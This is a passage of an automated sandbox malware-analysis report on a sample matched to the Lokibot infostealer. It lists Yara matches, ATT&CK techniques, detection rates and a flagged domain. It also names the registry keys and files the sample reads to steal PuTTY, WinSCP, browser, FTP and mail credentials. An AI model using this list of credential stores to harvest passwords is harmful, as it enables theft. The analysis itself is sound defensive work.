                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_00406069 GetUserNameW,1_2_00406069
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information:

                    barindex
                    Yara detected LokibotShow sources
                    Source: Yara matchFile source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 7108, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 4852, type: MEMORY
                    Source: Yara matchFile source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPE
                    Yara detected LokibotShow sources
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000001.00000003.480912778.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.607799523.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.476321253.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.452594690.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.549778212.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.546020230.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.414092067.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.491795139.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.562835408.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.563787570.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.481769783.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.474650127.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.477261856.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.529649981.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.480003007.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.485355648.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.479061979.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.446798245.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.450970355.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.490732616.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.446675906.0000000000E7D000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.519148526.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.472912647.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.565557733.0000000000E7D000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.517673183.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.396032754.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.560853517.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.419428408.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.535977726.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.486325651.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.493532930.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.533197865.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.420351505.0000000000E7D000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.532205941.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.416818180.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.489824103.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.450013817.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.488133602.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)Show sources
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Tries to harvest and steal ftp login credentialsShow sources
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                    Tries to steal Mail credentials (via file access)Show sources
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Tries to steal Mail credentials (via file registry)Show sources
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: PopPassword1_2_0040D069
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: SmtpPassword1_2_0040D069
                    Source: Yara matchFile source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 4852, type: MEMORY
                    Source: Yara matchFile source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPE

                    Remote Access Functionality:

                    barindex
                    Yara detected LokibotShow sources
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 00000001.00000003.480912778.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.607799523.0000000000E68000.00000004.00000020.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.476321253.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.452594690.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.549778212.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.546020230.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.414092067.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.491795139.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.562835408.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.563787570.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.481769783.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.474650127.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.477261856.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.529649981.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.480003007.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.485355648.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.479061979.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.446798245.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.450970355.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.490732616.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.446675906.0000000000E7D000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.519148526.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.472912647.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.565557733.0000000000E7D000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.517673183.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.396032754.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.560853517.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.419428408.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.535977726.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.486325651.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.493532930.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.533197865.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.420351505.0000000000E7D000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.532205941.0000000000E84000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.416818180.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.489824103.0000000000E85000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.450013817.0000000000E7C000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.488133602.0000000000E85000.00000004.00000001.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid AccountsCommand and Scripting Interpreter2Path InterceptionAccess Token Manipulation1Disable or Modify Tools1OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection12Deobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information4Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing12NTDSSecurity Software Discovery111Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading1Cached Domain CredentialsProcess Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion2DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobAccess Token Manipulation1Proc FilesystemSystem Owner/User Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection12/etc/passwd and /etc/shadowRemote System Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe40%VirustotalBrowse
                    SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe21%ReversingLabsByteCode-MSIL.Trojan.Burkina
                    SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    SourceDetectionScannerLabelLinkDownload
                    1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                    Domains

                    SourceDetectionScannerLabelLink
                    nevomw.com11%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.fontbureau.comce90%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.ibsensoftware.com/0%URL Reputationsafe
